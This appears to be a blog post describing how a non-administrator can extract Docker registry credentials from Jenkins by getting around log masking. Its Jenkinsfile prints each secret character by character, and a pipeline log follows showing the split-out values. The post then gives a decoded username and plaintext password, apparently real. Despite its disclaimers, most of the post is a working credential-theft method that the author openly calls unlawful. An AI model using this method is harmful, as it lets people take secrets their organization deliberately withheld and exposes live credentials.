First off, I want to state that what I'm about to describe isn't lawful. If you need access to secret credentials, you should request them from your administrator. I am not responsible for any misuse of this information.
The aim is to obtain secret keys for Docker registry repositories accessible from a pipeline.
When a pipeline runs, Docker registry credentials aren't exposed in the output. This is a security measure; credentials are replaced with asterisks, like so:
docker login -u jenkins-projects -p ******** https://your_jenkins.comThe issue arises when you're not a Jenkins administrator and, therefore, can't know the password. Often, companies won't provide this information for security reasons. They might give you a user account to download from the Docker registry, but the only way to upload images is through Jenkins, which can be frustrating in some scenarios.
You could potentially use the same pipeline to retrieve these credentials. Here's my code example:
pipeline {
agent any
stages {
stage('usernamePassword') {
steps {
script {
withCredentials([
usernamePassword(credentialsId: 'svn', //replace the ID of your secret key
usernameVariable: 'username',
passwordVariable: 'password')
]) {
print 'username=' + username + 'password=' + password
print 'username.collect { it }=' + username.collect { it }
print 'password.collect { it }=' + password.collect { it }
}
}
}
}
// fin
}
}Please note that you must replace the ID of your secret key, in this case: svn
The output from the above code will look like this:
18:02:32 [Pipeline] }
18:02:32 [Pipeline] // stage
18:02:32 [Pipeline] withEnv
18:02:32 [Pipeline] {
18:02:32 [Pipeline] stage
18:02:32 [Pipeline] { (usernamePassword)
18:02:33 [Pipeline] script
18:02:33 [Pipeline] {
18:02:33 [Pipeline] withCredentials
18:02:33 Masking supported pattern matches of $username or $password
18:02:33 [Pipeline] {
18:02:33 [Pipeline] echo
18:02:33 username=****password=****
18:02:33 [Pipeline] echo
18:02:33 username.collect { it }=[j, e, n, k, i, n, s, -, c, c, -, i, d, -, p, p, p, -, e, i, d]
18:02:33 [Pipeline] echo
18:02:33 password.collect { it }=[l, p, l, q, V, F, l, r, 6, 6, W, g, X, F, O, F, 5, 6, N, B]
18:02:33 [Pipeline] }
18:02:33 [Pipeline] // withCredentials
18:02:33 [Pipeline] }
18:02:33 [Pipeline] // script
18:02:33 [Pipeline] }
18:02:33 [Pipeline] // stage
18:02:33 [Pipeline] }
18:02:33 [Pipeline] // withEnv
18:02:33 [Pipeline] }
18:02:33 [Pipeline] // node
18:02:33 [Pipeline] End of Pipeline
18:02:33 [Bitbucket] Notifying commit build result
18:02:33 [Bitbucket] Build result notified
18:02:33 Finished: SUCCESSYou'll notice that username.collect and password.collect contain the password; just remove the commas to get what you need.
Username: jenkins-cc-id-ppp-eid
Password: lplqVFlr66WgXFOF56NB
The following link serves as a clear reference for my code: Accessing and Dumping Jenkins Credentials
Disclaimer: This post is for educational purposes only. Manipulating or accessing credentials without authorization is unethical and likely violates terms of service and legal agreements. Always follow your organization's policies and procedures for managing credentials.